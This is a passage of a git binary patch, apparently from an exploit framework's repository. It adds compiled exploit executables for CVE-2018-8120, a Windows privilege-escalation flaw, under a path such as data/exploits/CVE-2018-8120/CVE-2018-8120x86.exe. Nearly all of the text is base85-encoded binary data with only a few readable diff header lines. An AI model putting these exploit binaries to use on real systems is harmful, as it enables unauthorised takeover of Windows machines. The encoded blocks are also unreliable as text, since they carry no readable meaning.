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 Ke&7FJ{ro35FR#b| literal 0 HcmV?d00001 
diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe new file mode 100755 index 0000000000000000000000000000000000000000..4485c7b002938cd2fee589b817e1327417622591 GIT binary patch literal 83456 zcmeFae|%KM)jxhWyGa(h{DCrX1Xf{D5urabB^3xXMcIBxw+y$(V zAKom@&3M(PmDcvrRvPVttxro^5k%1}!2}RBptZ5k8kOp-OEp$Z7Kpi@_nEt!Eb7zG z_w{{!|NO#h@4a(o=FFKhXJ*bh^CK0vJtSErNwVQ*7?QLHZ~EsE&wu~uMfBLId&f%8 zjC%EwJ(h*9UUF;TyX*7T)!lt(-R=L8_nq6n_r1H7yl>x;R~PzT-gm#3SGu?=??3Kd zbH^1~S)=n4sBdb#`bT5mT^>pPtbf`Uxe{UPpVWv&ykCgij`tfE|1^>=(yfU2@qWJH zxri*{e<v4oT_;zPyx6UHj z$9@I+6+mE`<@`43m87{}hcA)y3gwPX3cj;n$AjqV#*Z2~z09&|CHu#Ujw&`~GScY(McmUX z1}ptWH&U-K-caK|2z@KuuZ;5Z38O_OBQ(fwz$fbi1_rGCp;rUWi-GkK6YCxl(PbuL z;|*V+km6oN2UZW*Q{&i@LG^5IUG{UtGOm#J~fhS_05nY5}agNC_19?-gyRSddb<+-C!NAPCV9^VMingFKe zSv?Yc(r)GfhCS;5UgdgqC4W5uOlhw@PSDLe{zH;Rss*vo!>2zn3}1kHx*i^+ZzE^& zyB;ar&P0?lzL?_HJJ>FY1?w-2jf?O!U!W1C@j#YfGTTLHbiEJHt}s2pB&joej=uQ+ zP~Cf~0(&UOHD->WB`8%HIUdLWi-(QSja7keik_H^t`1Ojk||7779`9I*rp=gFGM<< zkW7<%f6X*G5y(e;wJCxHU5)z$4N8VpkcFhy&Q&X2uP)=iNu)R1d(T4$z@N6Ysr=Ey z+)eeNC)Ee6nP-Z3J~$MZi*mHEZJuFpC#c~^z;(4f&&O{OVry6TQN}c7dSDY#dhGbzbZeQL!GTU za1a=LU17>bX^po`6qQCd3p)W+@&;){lY zhw&BtF&=6>Lk=&)gsbk$MqXs00f(YPMf}k(2pf%9lQ09BczY3L;$0xV2=C+Ki|{^* zuh_NxJHr_-9nKgRiHIPd_@az^hBH2cujj>p6%WLTXS;}7UFkHq<%?>wzOL{IVv}Il zoAd<%hTvWX$)@HDIP=gPze5A?3n2rd$$m-ga=;O^n9UKi1*Agi5tQ8*#0OzS`_B~Z z|5msity)TGCX4}^W5gF~`K1DlJ(!k2BL!%#4dTC%GfVWU5h~VD_L)S*kCWLiOi*Dp zv!lGiFJ-!)GJS?2fv-$vI!Sc^>9&LitkV%h^ 